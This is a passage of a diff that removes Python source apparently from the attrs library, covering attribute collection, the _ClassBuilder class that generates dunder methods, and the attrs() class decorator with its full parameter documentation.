MyClassAttributes(tuple): - __slots__ = () - x = property(itemgetter(0)) - """ - attr_class_name = f"{cls_name}Attributes" - attr_class_template = [ - f"class {attr_class_name}(tuple):", - " __slots__ = ()", - ] - if attr_names: - for i, attr_name in enumerate(attr_names): - attr_class_template.append( - f" {attr_name} = _attrs_property(_attrs_itemgetter({i}))" - ) - else: - attr_class_template.append(" pass") - globs = {"_attrs_itemgetter": itemgetter, "_attrs_property": property} - _compile_and_eval("\n".join(attr_class_template), globs) - return globs[attr_class_name] - - -# Tuple class for extracted attributes from a class definition. -# `base_attrs` is a subset of `attrs`. -_Attributes = _make_attr_tuple_class( - "_Attributes", - [ - # all attributes to build dunder methods for - "attrs", - # attributes that have been inherited - "base_attrs", - # map inherited attributes to their originating classes - "base_attrs_map", - ], -) - - -def _is_class_var(annot): - """ - Check whether *annot* is a typing.ClassVar. - - The string comparison hack is used to avoid evaluating all string - annotations which would put attrs-based classes at a performance - disadvantage compared to plain old classes. - """ - annot = str(annot) - - # Annotation can be quoted. - if annot.startswith(("'", '"')) and annot.endswith(("'", '"')): - annot = annot[1:-1] - - return annot.startswith(_classvar_prefixes) - - -def _has_own_attribute(cls, attrib_name): - """ - Check whether *cls* defines *attrib_name* (and doesn't just inherit it). - """ - attr = getattr(cls, attrib_name, _sentinel) - if attr is _sentinel: - return False - - for base_cls in cls.__mro__[1:]: - a = getattr(base_cls, attrib_name, None) - if attr is a: - return False - - return True - - -def _get_annotations(cls): - """ - Get annotations for *cls*. - """ - if _has_own_attribute(cls, "__annotations__"): - return cls.__annotations__ - - return {} - - -def _collect_base_attrs(cls, taken_attr_names): - """ - Collect attr.ibs from base classes of *cls*, except *taken_attr_names*. - """ - base_attrs = [] - base_attr_map = {} # A dictionary of base attrs to their classes. - - # Traverse the MRO and collect attributes. - for base_cls in reversed(cls.__mro__[1:-1]): - for a in getattr(base_cls, "__attrs_attrs__", []): - if a.inherited or a.name in taken_attr_names: - continue - - a = a.evolve(inherited=True) - base_attrs.append(a) - base_attr_map[a.name] = base_cls - - # For each name, only keep the freshest definition i.e. the furthest at the - # back. base_attr_map is fine because it gets overwritten with every new - # instance. - filtered = [] - seen = set() - for a in reversed(base_attrs): - if a.name in seen: - continue - filtered.insert(0, a) - seen.add(a.name) - - return filtered, base_attr_map - - -def _collect_base_attrs_broken(cls, taken_attr_names): - """ - Collect attr.ibs from base classes of *cls*, except *taken_attr_names*. - - N.B. *taken_attr_names* will be mutated. - - Adhere to the old incorrect behavior. - - Notably it collects from the front and considers inherited attributes which - leads to the buggy behavior reported in #428. - """ - base_attrs = [] - base_attr_map = {} # A dictionary of base attrs to their classes. - - # Traverse the MRO and collect attributes. - for base_cls in cls.__mro__[1:-1]: - for a in getattr(base_cls, "__attrs_attrs__", []): - if a.name in taken_attr_names: - continue - - a = a.evolve(inherited=True) - taken_attr_names.add(a.name) - base_attrs.append(a) - base_attr_map[a.name] = base_cls - - return base_attrs, base_attr_map - - -def _transform_attrs( - cls, these, auto_attribs, kw_only, collect_by_mro, field_transformer -): - """ - Transform all `_CountingAttr`s on a class into `Attribute`s. - - If *these* is passed, use that and don't look for them on the class. - - *collect_by_mro* is True, collect them in the correct MRO order, otherwise - use the old -- incorrect -- order. See #428. - - Return an `_Attributes`. - """ - cd = cls.__dict__ - anns = _get_annotations(cls) - - if these is not None: - ca_list = [(name, ca) for name, ca in these.items()] - elif auto_attribs is True: - ca_names = { - name - for name, attr in cd.items() - if isinstance(attr, _CountingAttr) - } - ca_list = [] - annot_names = set() - for attr_name, type in anns.items(): - if _is_class_var(type): - continue - annot_names.add(attr_name) - a = cd.get(attr_name, NOTHING) - - if not isinstance(a, _CountingAttr): - if a is NOTHING: - a = attrib() - else: - a = attrib(default=a) - ca_list.append((attr_name, a)) - - unannotated = ca_names - annot_names - if len(unannotated) > 0: - raise UnannotatedAttributeError( - "The following `attr.ib`s lack a type annotation: " - + ", ".join( - sorted(unannotated, key=lambda n: cd.get(n).counter) - ) - + "." - ) - else: - ca_list = sorted( - ( - (name, attr) - for name, attr in cd.items() - if isinstance(attr, _CountingAttr) - ), - key=lambda e: e[1].counter, - ) - - own_attrs = [ - Attribute.from_counting_attr( - name=attr_name, ca=ca, type=anns.get(attr_name) - ) - for attr_name, ca in ca_list - ] - - if collect_by_mro: - base_attrs, base_attr_map = _collect_base_attrs( - cls, {a.name for a in own_attrs} - ) - else: - base_attrs, base_attr_map = _collect_base_attrs_broken( - cls, {a.name for a in own_attrs} - ) - - if kw_only: - own_attrs = [a.evolve(kw_only=True) for a in own_attrs] - base_attrs = [a.evolve(kw_only=True) for a in base_attrs] - - attrs = base_attrs + own_attrs - - # Mandatory vs non-mandatory attr order only matters when they are part of - # the __init__ signature and when they aren't kw_only (which are moved to - # the end and can be mandatory or non-mandatory in any order, as they will - # be specified as keyword args anyway). Check the order of those attrs: - had_default = False - for a in (a for a in attrs if a.init is not False and a.kw_only is False): - if had_default is True and a.default is NOTHING: - raise ValueError( - "No mandatory attributes allowed after an attribute with a " - f"default value or factory. Attribute in question: {a!r}" - ) - - if had_default is False and a.default is not NOTHING: - had_default = True - - if field_transformer is not None: - attrs = field_transformer(cls, attrs) - - # Resolve default field alias after executing field_transformer. - # This allows field_transformer to differentiate between explicit vs - # default aliases and supply their own defaults. - attrs = [ - a.evolve(alias=_default_init_alias_for(a.name)) if not a.alias else a - for a in attrs - ] - - # Create AttrsClass *after* applying the field_transformer since it may - # add or remove attributes! - attr_names = [a.name for a in attrs] - AttrsClass = _make_attr_tuple_class(cls.__name__, attr_names) - - return _Attributes((AttrsClass(attrs), base_attrs, base_attr_map)) - - -def _frozen_setattrs(self, name, value): - """ - Attached to frozen classes as __setattr__. - """ - if isinstance(self, BaseException) and name in ( - "__cause__", - "__context__", - "__traceback__", - ): - BaseException.__setattr__(self, name, value) - return - - raise FrozenInstanceError() - - -def _frozen_delattrs(self, name): - """ - Attached to frozen classes as __delattr__. - """ - raise FrozenInstanceError() - - -class _ClassBuilder: - """ - Iteratively build *one* class. - """ - - __slots__ = ( - "_attr_names", - "_attrs", - "_base_attr_map", - "_base_names", - "_cache_hash", - "_cls", - "_cls_dict", - "_delete_attribs", - "_frozen", - "_has_pre_init", - "_has_post_init", - "_is_exc", - "_on_setattr", - "_slots", - "_weakref_slot", - "_wrote_own_setattr", - "_has_custom_setattr", - ) - - def __init__( - self, - cls, - these, - slots, - frozen, - weakref_slot, - getstate_setstate, - auto_attribs, - kw_only, - cache_hash, - is_exc, - collect_by_mro, - on_setattr, - has_custom_setattr, - field_transformer, - ): - attrs, base_attrs, base_map = _transform_attrs( - cls, - these, - auto_attribs, - kw_only, - collect_by_mro, - field_transformer, - ) - - self._cls = cls - self._cls_dict = dict(cls.__dict__) if slots else {} - self._attrs = attrs - self._base_names = {a.name for a in base_attrs} - self._base_attr_map = base_map - self._attr_names = tuple(a.name for a in attrs) - self._slots = slots - self._frozen = frozen - self._weakref_slot = weakref_slot - self._cache_hash = cache_hash - self._has_pre_init = bool(getattr(cls, "__attrs_pre_init__", False)) - self._has_post_init = bool(getattr(cls, "__attrs_post_init__", False)) - self._delete_attribs = not bool(these) - self._is_exc = is_exc - self._on_setattr = on_setattr - - self._has_custom_setattr = has_custom_setattr - self._wrote_own_setattr = False - - self._cls_dict["__attrs_attrs__"] = self._attrs - - if frozen: - self._cls_dict["__setattr__"] = _frozen_setattrs - self._cls_dict["__delattr__"] = _frozen_delattrs - - self._wrote_own_setattr = True - elif on_setattr in ( - _ng_default_on_setattr, - setters.validate, - setters.convert, - ): - has_validator = has_converter = False - for a in attrs: - if a.validator is not None: - has_validator = True - if a.converter is not None: - has_converter = True - - if has_validator and has_converter: - break - if ( - ( - on_setattr == _ng_default_on_setattr - and not (has_validator or has_converter) - ) - or (on_setattr == setters.validate and not has_validator) - or (on_setattr == setters.convert and not has_converter) - ): - # If class-level on_setattr is set to convert + validate, but - # there's no field to convert or validate, pretend like there's - # no on_setattr. - self._on_setattr = None - - if getstate_setstate: - ( - self._cls_dict["__getstate__"], - self._cls_dict["__setstate__"], - ) = self._make_getstate_setstate() - - def __repr__(self): - return f"<_ClassBuilder(cls={self._cls.__name__})>" - - if PY310: - import abc - - def build_class(self): - """ - Finalize class based on the accumulated configuration. - - Builder cannot be used after calling this method. - """ - if self._slots is True: - return self._create_slots_class() - - return self.abc.update_abstractmethods( - self._patch_original_class() - ) - - else: - - def build_class(self): - """ - Finalize class based on the accumulated configuration. - - Builder cannot be used after calling this method. - """ - if self._slots is True: - return self._create_slots_class() - - return self._patch_original_class() - - def _patch_original_class(self): - """ - Apply accumulated methods and return the class. - """ - cls = self._cls - base_names = self._base_names - - # Clean class of attribute definitions (`attr.ib()`s). - if self._delete_attribs: - for name in self._attr_names: - if ( - name not in base_names - and getattr(cls, name, _sentinel) is not _sentinel - ): - try: - delattr(cls, name) - except AttributeError: - # This can happen if a base class defines a class - # variable and we want to set an attribute with the - # same name by using only a type annotation. - pass - - # Attach our dunder methods. - for name, value in self._cls_dict.items(): - setattr(cls, name, value) - - # If we've inherited an attrs __setattr__ and don't write our own, - # reset it to object's. - if not self._wrote_own_setattr and getattr( - cls, "__attrs_own_setattr__", False - ): - cls.__attrs_own_setattr__ = False - - if not self._has_custom_setattr: - cls.__setattr__ = _obj_setattr - - return cls - - def _create_slots_class(self): - """ - Build and return a new class with a `__slots__` attribute. - """ - cd = { - k: v - for k, v in self._cls_dict.items() - if k not in tuple(self._attr_names) + ("__dict__", "__weakref__") - } - - # If our class doesn't have its own implementation of __setattr__ - # (either from the user or by us), check the bases, if one of them has - # an attrs-made __setattr__, that needs to be reset. We don't walk the - # MRO because we only care about our immediate base classes. - # XXX: This can be confused by subclassing a slotted attrs class with - # XXX: a non-attrs class and subclass the resulting class with an attrs - # XXX: class. See `test_slotted_confused` for details. For now that's - # XXX: OK with us. - if not self._wrote_own_setattr: - cd["__attrs_own_setattr__"] = False - - if not self._has_custom_setattr: - for base_cls in self._cls.__bases__: - if base_cls.__dict__.get("__attrs_own_setattr__", False): - cd["__setattr__"] = _obj_setattr - break - - # Traverse the MRO to collect existing slots - # and check for an existing __weakref__. - existing_slots = dict() - weakref_inherited = False - for base_cls in self._cls.__mro__[1:-1]: - if base_cls.__dict__.get("__weakref__", None) is not None: - weakref_inherited = True - existing_slots.update( - { - name: getattr(base_cls, name) - for name in getattr(base_cls, "__slots__", []) - } - ) - - base_names = set(self._base_names) - - names = self._attr_names - if ( - self._weakref_slot - and "__weakref__" not in getattr(self._cls, "__slots__", ()) - and "__weakref__" not in names - and not weakref_inherited - ): - names += ("__weakref__",) - - # We only add the names of attributes that aren't inherited. - # Setting __slots__ to inherited attributes wastes memory. - slot_names = [name for name in names if name not in base_names] - # There are slots for attributes from current class - # that are defined in parent classes. - # As their descriptors may be overridden by a child class, - # we collect them here and update the class dict - reused_slots = { - slot: slot_descriptor - for slot, slot_descriptor in existing_slots.items() - if slot in slot_names - } - slot_names = [name for name in slot_names if name not in reused_slots] - cd.update(reused_slots) - if self._cache_hash: - slot_names.append(_hash_cache_field) - cd["__slots__"] = tuple(slot_names) - - cd["__qualname__"] = self._cls.__qualname__ - - # Create new class based on old class and our methods. - cls = type(self._cls)(self._cls.__name__, self._cls.__bases__, cd) - - # The following is a fix for - # . - # If a method mentions `__class__` or uses the no-arg super(), the - # compiler will bake a reference to the class in the method itself - # as `method.__closure__`. Since we replace the class with a - # clone, we rewrite these references so it keeps working. - for item in cls.__dict__.values(): - if isinstance(item, (classmethod, staticmethod)): - # Class- and staticmethods hide their functions inside. - # These might need to be rewritten as well. - closure_cells = getattr(item.__func__, "__closure__", None) - elif isinstance(item, property): - # Workaround for property `super()` shortcut (PY3-only). - # There is no universal way for other descriptors. - closure_cells = getattr(item.fget, "__closure__", None) - else: - closure_cells = getattr(item, "__closure__", None) - - if not closure_cells: # Catch None or the empty list. - continue - for cell in closure_cells: - try: - match = cell.cell_contents is self._cls - except ValueError: # ValueError: Cell is empty - pass - else: - if match: - set_closure_cell(cell, cls) - - return cls - - def add_repr(self, ns): - self._cls_dict["__repr__"] = self._add_method_dunders( - _make_repr(self._attrs, ns, self._cls) - ) - return self - - def add_str(self): - repr = self._cls_dict.get("__repr__") - if repr is None: - raise ValueError( - "__str__ can only be generated if a __repr__ exists." - ) - - def __str__(self): - return self.__repr__() - - self._cls_dict["__str__"] = self._add_method_dunders(__str__) - return self - - def _make_getstate_setstate(self): - """ - Create custom __setstate__ and __getstate__ methods. - """ - # __weakref__ is not writable. - state_attr_names = tuple( - an for an in self._attr_names if an != "__weakref__" - ) - - def slots_getstate(self): - """ - Automatically created by attrs. - """ - return {name: getattr(self, name) for name in state_attr_names} - - hash_caching_enabled = self._cache_hash - - def slots_setstate(self, state): - """ - Automatically created by attrs. - """ - __bound_setattr = _obj_setattr.__get__(self) - if isinstance(state, tuple): - # Backward compatibility with attrs instances pickled with - # attrs versions before v22.2.0 which stored tuples. - for name, value in zip(state_attr_names, state): - __bound_setattr(name, value) - else: - for name in state_attr_names: - if name in state: - __bound_setattr(name, state[name]) - - # The hash code cache is not included when the object is - # serialized, but it still needs to be initialized to None to - # indicate that the first call to __hash__ should be a cache - # miss. - if hash_caching_enabled: - __bound_setattr(_hash_cache_field, None) - - return slots_getstate, slots_setstate - - def make_unhashable(self): - self._cls_dict["__hash__"] = None - return self - - def add_hash(self): - self._cls_dict["__hash__"] = self._add_method_dunders( - _make_hash( - self._cls, - self._attrs, - frozen=self._frozen, - cache_hash=self._cache_hash, - ) - ) - - return self - - def add_init(self): - self._cls_dict["__init__"] = self._add_method_dunders( - _make_init( - self._cls, - self._attrs, - self._has_pre_init, - self._has_post_init, - self._frozen, - self._slots, - self._cache_hash, - self._base_attr_map, - self._is_exc, - self._on_setattr, - attrs_init=False, - ) - ) - - return self - - def add_match_args(self): - self._cls_dict["__match_args__"] = tuple( - field.name - for field in self._attrs - if field.init and not field.kw_only - ) - - def add_attrs_init(self): - self._cls_dict["__attrs_init__"] = self._add_method_dunders( - _make_init( - self._cls, - self._attrs, - self._has_pre_init, - self._has_post_init, - self._frozen, - self._slots, - self._cache_hash, - self._base_attr_map, - self._is_exc, - self._on_setattr, - attrs_init=True, - ) - ) - - return self - - def add_eq(self): - cd = self._cls_dict - - cd["__eq__"] = self._add_method_dunders( - _make_eq(self._cls, self._attrs) - ) - cd["__ne__"] = self._add_method_dunders(_make_ne()) - - return self - - def add_order(self): - cd = self._cls_dict - - cd["__lt__"], cd["__le__"], cd["__gt__"], cd["__ge__"] = ( - self._add_method_dunders(meth) - for meth in _make_order(self._cls, self._attrs) - ) - - return self - - def add_setattr(self): - if self._frozen: - return self - - sa_attrs = {} - for a in self._attrs: - on_setattr = a.on_setattr or self._on_setattr - if on_setattr and on_setattr is not setters.NO_OP: - sa_attrs[a.name] = a, on_setattr - - if not sa_attrs: - return self - - if self._has_custom_setattr: - # We need to write a __setattr__ but there already is one! - raise ValueError( - "Can't combine custom __setattr__ with on_setattr hooks." - ) - - # docstring comes from _add_method_dunders - def __setattr__(self, name, val): - try: - a, hook = sa_attrs[name] - except KeyError: - nval = val - else: - nval = hook(self, a, val) - - _obj_setattr(self, name, nval) - - self._cls_dict["__attrs_own_setattr__"] = True - self._cls_dict["__setattr__"] = self._add_method_dunders(__setattr__) - self._wrote_own_setattr = True - - return self - - def _add_method_dunders(self, method): - """ - Add __module__ and __qualname__ to a *method* if possible. - """ - try: - method.__module__ = self._cls.__module__ - except AttributeError: - pass - - try: - method.__qualname__ = ".".join( - (self._cls.__qualname__, method.__name__) - ) - except AttributeError: - pass - - try: - method.__doc__ = ( - "Method generated by attrs for class " - f"{self._cls.__qualname__}." - ) - except AttributeError: - pass - - return method - - -def _determine_attrs_eq_order(cmp, eq, order, default_eq): - """ - Validate the combination of *cmp*, *eq*, and *order*. Derive the effective - values of eq and order. If *eq* is None, set it to *default_eq*. - """ - if cmp is not None and any((eq is not None, order is not None)): - raise ValueError("Don't mix `cmp` with `eq' and `order`.") - - # cmp takes precedence due to bw-compatibility. - if cmp is not None: - return cmp, cmp - - # If left None, equality is set to the specified default and ordering - # mirrors equality. - if eq is None: - eq = default_eq - - if order is None: - order = eq - - if eq is False and order is True: - raise ValueError("`order` can only be True if `eq` is True too.") - - return eq, order - - -def _determine_attrib_eq_order(cmp, eq, order, default_eq): - """ - Validate the combination of *cmp*, *eq*, and *order*. Derive the effective - values of eq and order. If *eq* is None, set it to *default_eq*. - """ - if cmp is not None and any((eq is not None, order is not None)): - raise ValueError("Don't mix `cmp` with `eq' and `order`.") - - def decide_callable_or_boolean(value): - """ - Decide whether a key function is used. - """ - if callable(value): - value, key = True, value - else: - key = None - return value, key - - # cmp takes precedence due to bw-compatibility. - if cmp is not None: - cmp, cmp_key = decide_callable_or_boolean(cmp) - return cmp, cmp_key, cmp, cmp_key - - # If left None, equality is set to the specified default and ordering - # mirrors equality. - if eq is None: - eq, eq_key = default_eq, None - else: - eq, eq_key = decide_callable_or_boolean(eq) - - if order is None: - order, order_key = eq, eq_key - else: - order, order_key = decide_callable_or_boolean(order) - - if eq is False and order is True: - raise ValueError("`order` can only be True if `eq` is True too.") - - return eq, eq_key, order, order_key - - -def _determine_whether_to_implement( - cls, flag, auto_detect, dunders, default=True -): - """ - Check whether we should implement a set of methods for *cls*. - - *flag* is the argument passed into @attr.s like 'init', *auto_detect* the - same as passed into @attr.s and *dunders* is a tuple of attribute names - whose presence signal that the user has implemented it themselves. - - Return *default* if no reason for either for or against is found. - """ - if flag is True or flag is False: - return flag - - if flag is None and auto_detect is False: - return default - - # Logically, flag is None and auto_detect is True here. - for dunder in dunders: - if _has_own_attribute(cls, dunder): - return False - - return default - - -def attrs( - maybe_cls=None, - these=None, - repr_ns=None, - repr=None, - cmp=None, - hash=None, - init=None, - slots=False, - frozen=False, - weakref_slot=True, - str=False, - auto_attribs=False, - kw_only=False, - cache_hash=False, - auto_exc=False, - eq=None, - order=None, - auto_detect=False, - collect_by_mro=False, - getstate_setstate=None, - on_setattr=None, - field_transformer=None, - match_args=True, - unsafe_hash=None, -): - r""" - A class decorator that adds :term:`dunder methods` according to the - specified attributes using `attr.ib` or the *these* argument. - - Please consider using `attrs.define` / `attrs.frozen` in new code - (``attr.s`` will *never* go away, though). - - :param these: A dictionary of name to `attr.ib` mappings. This is - useful to avoid the definition of your attributes within the class body - because you can't (e.g. if you want to add ``__repr__`` methods to - Django models) or don't want to. - - If *these* is not ``None``, *attrs* will *not* search the class body - for attributes and will *not* remove any attributes from it. - - The order is deduced from the order of the attributes inside *these*. - - :type these: `dict` of `str` to `attr.ib` - - :param str repr_ns: When using nested classes, there's no way in Python 2 - to automatically detect that. Therefore it's possible to set the - namespace explicitly for a more meaningful ``repr`` output. - :param bool auto_detect: Instead of setting the *init*, *repr*, *eq*, - *order*, and *hash* arguments explicitly, assume they are set to - ``True`` **unless any** of the involved methods for one of the - arguments is implemented in the *current* class (i.e. it is *not* - inherited from some base class). - - So for example by implementing ``__eq__`` on a class yourself, - *attrs* will deduce ``eq=False`` and will create *neither* - ``__eq__`` *nor* ``__ne__`` (but Python classes come with a sensible - ``__ne__`` by default, so it *should* be enough to only implement - ``__eq__`` in most cases). - - .. warning:: - - If you prevent *attrs* from creating the ordering methods for you - (``order=False``, e.g. by implementing ``__le__``), it becomes - *your* responsibility to make sure its ordering is sound. The best - way is to use the `functools.total_ordering` decorator. - - - Passing ``True`` or ``False`` to *init*, *repr*, *eq*, *order*, - *cmp*, or *hash* overrides whatever *auto_detect* would determine. - - :param bool repr: Create a ``__repr__`` method with a human readable - representation of *attrs* attributes.. - :param bool str: Create a ``__str__`` method that is identical to - ``__repr__``. This is usually not necessary except for - `Exception`\ s. - :param Optional[bool] eq: If ``True`` or ``None`` (default), add ``__eq__`` - and ``__ne__`` methods that check two instances for equality. - - They compare the instances as if they were tuples of their *attrs* - attributes if and only if the types of both classes are *identical*! - :param Optional[bool] order: If ``True``, add ``__lt__``, ``__le__``, - ``__gt__``, and ``__ge__`` methods that behave like *eq* above and - allow instances to be ordered. If ``None`` (default) mirror value of - *eq*. - :param Optional[bool] cmp: Setting *cmp* is equivalent to setting *eq* - and *order* to the same value. Must not be mixed with *eq* or *order*. - :param Optional[bool] unsafe_hash: If ``None`` (default), the ``__hash__`` - method is generated according how *eq* and *frozen* are set. - - 1. If *both* are True, *attrs* will generate a ``__hash__`` for you. - 2. If *eq* is True and *frozen* is False, ``__hash__`` will be set to - None, marking it unhashable (which it is). - 3. If *eq* is False, ``__hash__`` will be left untouched meaning the - ``__hash__`` method of the base class will be used (if base class is - ``object``, this means it will fall back to id-based hashing.). - - Although not recommended, you can decide for yourself and force - *attrs* to create one (e.g. if the class is immutable even though you - didn't freeze it programmatically) by passing ``True`` or not. Both of - these cases are rather special and should be used carefully. - - See our documentation on `hashing`, Python's documentation on - `object.__hash__`, and the `GitHub issue that led to the default \ - behavior `_ for more - details. - :param Optional[bool] hash: Alias for *unsafe_hash*. *unsafe_hash* takes - precedence. - :param bool init: Create a ``__init__`` method that initializes the - *attrs* attributes. Leading underscores are stripped for the argument - name. If a ``__attrs_pre_init__`` method exists on the class, it will - be called before the class is initialized. If a ``__attrs_post_init__`` - method exists on the class, it will be called after the class is fully - initialized. - - If ``init`` is ``False``, an ``__attrs_init__`` method will be - injected instead. This allows you to define a custom ``__init__`` - method that can do pre-init work such as ``super().__init__()``, - and then call ``__attrs_init__()`` and ``__attrs_post_init__()``. - :param bool slots: Create a :term:`slotted class ` that's - more memory-efficient. Slotted classes are generally superior to the - default dict classes, but have some gotchas you should know about, so - we encourage you to read the :term:`glossary entry `. - :param bool frozen: Make instances immutable after initialization. If - someone attempts to modify a frozen instance, - `attrs.exceptions.FrozenInstanceError` is raised. - - .. note:: - - 1. This is achieved by installing a custom ``__setattr__`` method - on your class, so you can't implement your own. - - 2. True immutability is impossible in Python. - - 3. This *does* have a minor a runtime performance `impact - ` when initializing new instances. In other words: - ``__init__`` is slightly slower with ``frozen=True``. - - 4. If a class is frozen, you cannot modify ``self`` in - ``__attrs_post_init__`` or a self-written ``__init__``. You can - circumvent that limitation by using - ``object.__setattr__(self, "attribute_name", value)``. - - 5. Subclasses of a frozen class are frozen too. - - :param bool weakref_slot: Make instances weak-referenceable. This has no - effect unless ``slots`` is also enabled. - :param bool auto_attribs: If ``True``, collect :pep:`526`-annotated - attributes from the class body. - - In this case, you **must** annotate every field. If *attrs* - encounters a field that is set to an `attr.ib` but lacks a type - annotation, an `attr.exceptions.UnannotatedAttributeError` is - raised. Use ``field_name: typing.Any = attr.ib(...)`` if you don't - want to set a type. - - If you assign a value to those attributes (e.g. ``x: int = 42``), that - value becomes the default value like if it were passed using - ``attr.ib(default=42)``. Passing an instance of `attrs.Factory` also - works as expected in most cases (see warning below). - - Attributes annotated as `typing.ClassVar`, and attributes that are - neither annotated nor set to an `attr.ib` are **ignored**. - - .. warning:: - For features that use the attribute name to create decorators (e.g. - :ref:`validators `), you still *must* assign `attr.ib` - to them. Otherwise Python will either not find the name or try to - use the default value to call e.g. ``validator`` on it. - - These errors can be quite confusing and probably the most common bug - report on our bug tracker. - - :param bool kw_only: Make all attributes keyword-only - in the generated ``__init__`` (if ``init`` is ``False``, this - parameter is ignored). - :param bool cache_hash: Ensure that the object's hash code is computed - only once and stored on the object. If this is set to ``True``, - hashing must be either explicitly or implicitly enabled for this - class. If the hash code is cached, avoid any reassignments of - fields involved in hash code computation or mutations of the objects - those fields point to after object creation. If such changes occur, - the behavior of the object's hash code is undefined. - :param bool auto_exc: If the class subclasses `BaseException` - (which implicitly includes any subclass of any exception), the - following happens to behave like a well-behaved Python exceptions - class: - - - the values for *eq*, *order*, and *hash* are ignored and the - instances compare and hash by the instance's ids (N.B. *attrs* will - *not* remove existing implementations of ``__hash__`` or the equality - methods. It just won't add own ones.), - - all attributes that are either passed into ``__init__`` or have a - default value are additionally available as a tuple in the ``args`` - attribute, - - the value of *str* is ignored leaving ``__str__`` to base classes. - :param bool collect_by_mro: Setting this to `True` fixes the way *attrs* - collects attributes from base classes. The default behavior is - incorrect in certain cases of multiple inheritance. It should be on by - default but is kept off for backward-compatibility. - - See issue `#428 `_ for - more details. - - :param Optional[bool] getstate_setstate: - .. note:: - This is usually only interesting for slotted classes and you should - probably just set *auto_detect* to `True`. - - If `True`, ``__getstate__`` and - ``__setstate__`` are generated and attached to the class. This is - necessary for slotted classes to be pickleable. If left `None`, it's - `True` by default for slotted classes and ``False`` for dict classes. - - If *auto_detect* is `True`, and *getstate_setstate* is left `None`, - and **either** ``__getstate__`` or ``__setstate__`` is detected directly - on the class (i.e. not inherited), it is set to `False` (this is usually - what you want). - - :param on_setattr: A callable that is run whenever the user attempts to set - an attribute (either by assignment like ``i.x = 42`` or by using - `setattr` like ``setattr(i, "x", 42)``). It receives the same arguments - as validators: the instance, the attribute that is being modified, and - the new value. - - If no exception is raised, the attribute is set to the return value of - the callable. - - If a list of callables is passed, they're automatically wrapped in an - `attrs.setters.pipe`. - :type on_setattr: `callable`, or a list of callables, or `None`, or - `attrs.setters.NO_OP` - - :param Optional[callable] field_transformer: - A function that is called with the original class object and all - fields right before *attrs* finalizes the class. You can use - this, e.g., to automatically add converters or validators to - fields based on their types. See `transform-fields` for more details. - - :param bool match_args: - If `True` (default), set ``__match_args__`` on the class to support - :pep:`634` (Structural Pattern Matching). It is a tuple of all - non-keyword-only ``__init__`` parameter names on Python 3.10 and later. - Ignored on older Python versions. - - .. versionadded:: 16.0.0 *slots* - .. versionadded:: 16.1.0 *frozen* - .. versionadded:: 16.3.0 *str* - .. versionadded:: 16.3.0 Support for ``__attrs_post_init__``. - .. versionchanged:: 17.1.0 - *hash* supports ``None`` as value which is also the default now. - .. versionadded:: 17.3.0 *auto_attribs* - .. versionchanged:: 18.1.0 - If *these* is passed, no attributes are deleted from the class body. - .. versionchanged:: 18.1.0 If *these* is ordered, the order is retained. - .. versionadded:: 18.2.0 *weakref_slot* - .. deprecated:: 18.2.0 - ``__lt__``, ``__le__``, ``__gt__``, and ``__ge__`` now raise a - `DeprecationWarning` if the classes compared are subclasses of - each other. ``__eq`` and ``__ne__`` never tried to compared subclasses - to each other. - .. versionchanged:: 19.2.0 - ``__lt__``, ``__le__``, ``__gt__``, and ``__ge__`` now do not consider - subclasses comparable anymore. - .. versionadded:: 18.2.0 *kw_only* - .. versionadded:: 18.2.0 *cache_hash* - .. versionadded:: 19.1.0 *auto_exc* - .. deprecated:: 19.2.0 *cmp* Removal on or after 2021-06-01. - .. versionadded:: 19.2.0 *eq* and *order* - .. versionadded:: 20.1.0 *auto_detect* - .. versionadded:: 20.1.0 *collect_by_mro* - .. versionadded:: 20.1.0 *getstate_setstate* - .. versionadded:: 20.1.0 *on_setattr* - .. versionadded:: 20.3.0 *field_transformer* - .. versionchanged:: 21.1.0 - ``init=False`` injects ``__attrs_init__`` - .. versionchanged:: 21.1.0 Support for ``__attrs_pre_init__`` - .. versionchanged:: 21.1.0 *cmp* undeprecated - .. versionadded:: 21.3.0 *match_args* - .. versionadded:: 22.2.0 - *unsafe_hash* as an alias for *hash* (for :pep:`681` compliance). - """ - eq_, order_ = _determine_attrs_eq_order(cmp, eq, order, None) - - # unsafe_hash takes precedence due to PEP 681. - if unsafe_hash is not None: - hash = unsafe_hash - - if isinstance(on_setattr, (list, tuple)): - on_setattr = setters.pipe(*on_setattr) - - def wrap(cls): - is_frozen = frozen or _has_frozen_base_class(cls) - is_exc = auto_exc is True and issubclass(cls, BaseException) - has_own_setattr = auto_detect and _has_own_attribute( - cls, "__setattr__" - ) - - if has_own_setattr and is_frozen: - raise ValueError("Can't freeze a class with a custom __setattr__.") - - builder = _ClassBuilder( - cls, - these, - slots, - is_frozen, - weakref_slot, - _determine_whether_to_implement( - cls, - getstate_setstate, - auto_detect, - ("__getstate__", "__setstate__"), - default=slots, - ), - auto_attribs, - kw_only, - cache_hash, - is_exc, - collect_by_mro, - on_setattr, - has_own_setattr, - field_transformer, - ) - if _determine_whether_to_implement( - cls, repr, auto_detect, ("__repr__",) - ): - builder.add_repr(repr_ns) - if str is True: - builder.add_str() - - eq = _determine_whether_to_implement( - cls, eq_, auto_detect, ("__eq__", "__ne__") - ) - if not is_exc and eq is True: - builder.add_eq() - if not is_exc and _determine_whether_to_implement( - cls, order_, auto_detect, ("__lt__", "__le__", "__gt__", "__ge__") - ): - builder.add_order() - - builder.add_setattr() - - nonlocal hash - if ( - hash is None - and auto_detect is True - and _has_own_attribute(cls, "__hash__") - ): - hash = False - - if hash is not True and hash is not False and hash is not None: - # Can't use `hash in` because 1 == True for example. - raise TypeError( - "Invalid value for hash. Must be True, False, or None." - ) - elif hash is False or (hash is None and eq is False) or is_exc: - # Don't do anything. Should fall back to __object__'s __hash__ - # which is by id. - if cache_hash: - raise TypeError( - "Invalid value for cache_hash. To use hash caching," - " hashing must be either explicitly or implicitly " - "enabled." - ) - elif hash is True or ( - hash is None and eq is True and is_frozen is True - ): - # Build a __hash__ if told so, or if it's safe. - builder.add_hash() - else: - # Raise TypeError on attempts to hash. - if cache_hash: - raise TypeError( - "Invalid value for cache_hash. To use hash caching," - " hashing must be either explicitly or implicitly " - "enabled." - ) - builder.make_unhashable() - - if _determine_whether_to_implement( - cls, init, auto_detect, ("__init__",) - ): - builder.add_init() - else: - builder.add_attrs_init() - if cache_hash: - raise TypeError( - "Invalid value for cache_hash. To use hash caching," - " init must be True." - ) - - if ( - PY310 - and match_args - and not _has_own_attribute(cls, "__match_args__") - ): - builder.add_match_args() - - return builder.build_class() - - # maybe_cls's type depends on the usage of the decorator. It's a class - # if it's used as `@attrs` but ``None`` if used as `@attrs()`. - if maybe_cls is None: - return wrap - else: - return wrap(maybe_cls) - - 